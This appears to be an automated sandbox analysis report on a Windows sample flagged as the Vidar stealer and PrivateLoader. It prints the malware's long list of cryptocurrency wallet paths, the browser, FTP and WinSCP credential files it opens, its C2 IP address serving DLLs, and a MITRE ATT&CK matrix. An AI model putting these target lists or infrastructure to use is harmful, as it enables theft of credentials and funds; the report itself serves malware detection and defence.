                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Opens network shares
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                      Source: Yara matchFile source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2832, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected PrivateLoader
                      Source: Yara matchFile source: C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll, type: DROPPED
                      Yara detected Vidar
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2171023727.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 2520, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2832, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E0C40 sqlite3_bind_zeroblob,2_2_6C9E0C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E0D60 sqlite3_bind_parameter_name,2_2_6C9E0D60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C908EA0 sqlite3_clear_bindings,2_2_6C908EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,2_2_6C9E0B40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C906410 bind,WSAGetLastError,2_2_6C906410
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9060B0 listen,WSAGetLastError,2_2_6C9060B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C90C030 sqlite3_bind_parameter_count,2_2_6C90C030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C90C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,2_2_6C90C050
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C906070 PR_Listen,2_2_6C906070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8922D0 sqlite3_bind_blob,2_2_6C8922D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9063C0 PR_Bind,2_2_6C9063C0

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		2
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		2
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Native API                      		Boot or Logon Initialization Scripts511
                      Process Injection                      		2
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      Account Discovery                      		Remote Desktop Protocol4
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                      DLL Side-Loading                      		Security Account Manager4
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Screen Capture                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Masquerading                      		NTDS56
                      System Information Discovery                      		Distributed Component Object ModelInput Capture114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Virtualization/Sandbox Evasion                      		LSA Secrets1
                      Network Share Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts511
                      Process Injection                      		Cached Domain Credentials141
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      System Owner/User Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1440170 Sample: file.exe Startdate: 12/05/2024 Architecture: WINDOWS Score: 100 33 steamcommunity.com 2->33 39 Multi AV Scanner detection for domain / URL 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 9 other signatures 2->45 9 file.exe 1 2->9         started        signatures3 process4 signatures5 47 Contains functionality to inject code into remote processes 9->47 49 Writes to foreign memory regions 9->49 51 Allocates memory in foreign processes 9->51 53 Injects a PE file into a foreign processes 9->53 12 RegAsm.exe 1 45 9->12         started        17 conhost.exe 9->17         started        process6 dnsIp7 35 65.109.242.112, 443, 49731, 49732 ALABANZA-BALTUS United States 12->35 37 steamcommunity.com 23.195.238.96, 443, 49730 AKAMAI-ASUS United States 12->37 25 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 12->25 dropped 27 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->27 dropped 29 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->29 dropped 31 10 other files (none is malicious) 12->31 dropped 55 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 12->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->59 61 6 other signatures 12->61 19 cmd.exe 1 12->19         started        file8 signatures9 process10 process11 21 conhost.exe 19->21         started        23 timeout.exe 1 19->23         started       

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe100%AviraHEUR/AGEN.1318539
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\ProgramData\BGDAAKJJDAAK\freebl3.dll0%ReversingLabs
                      C:\ProgramData\BGDAAKJJDAAK\freebl3.dll0%VirustotalBrowse
                      C:\ProgramData\BGDAAKJJDAAK\mozglue.dll0%ReversingLabs
                      C:\ProgramData\BGDAAKJJDAAK\mozglue.dll0%VirustotalBrowse
                      C:\ProgramData\BGDAAKJJDAAK\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\BGDAAKJJDAAK\msvcp140.dll0%VirustotalBrowse
                      C:\ProgramData\BGDAAKJJDAAK\nss3.dll0%ReversingLabs
                      C:\ProgramData\BGDAAKJJDAAK\nss3.dll0%VirustotalBrowse
                      C:\ProgramData\BGDAAKJJDAAK\softokn3.dll0%ReversingLabs
                      C:\ProgramData\BGDAAKJJDAAK\softokn3.dll0%VirustotalBrowse
                      C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll0%ReversingLabs
                      C:\ProgramData\BGDAAKJJDAAK\vcruntime140.dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll1%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%VirustotalBrowse
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%VirustotalBrowse

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
                      https://mozilla.org0/0%URL Reputationsafe
                      https://mozilla.org0/0%URL Reputationsafe
                      https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta0%URL Reputationsafe
                      https://65.109.242.112/freebl3.dllo0%Avira URL Cloudsafe
                      http://store.st0%Avira URL Cloudsafe
                      https://65.109.242.112/nss3.dllMsi0%Avira URL Cloudsafe
                      https://65.109.242.112/softokn3.dllM0%Avira URL Cloudsafe
                      https://65.109.242.112/msvcp140.dll0%Avira URL Cloudsafe
                      https://65.109.242.112/freebl3.dll0%Avira URL Cloudsafe
                      https://65.109.242.1120%Avira URL Cloudsafe
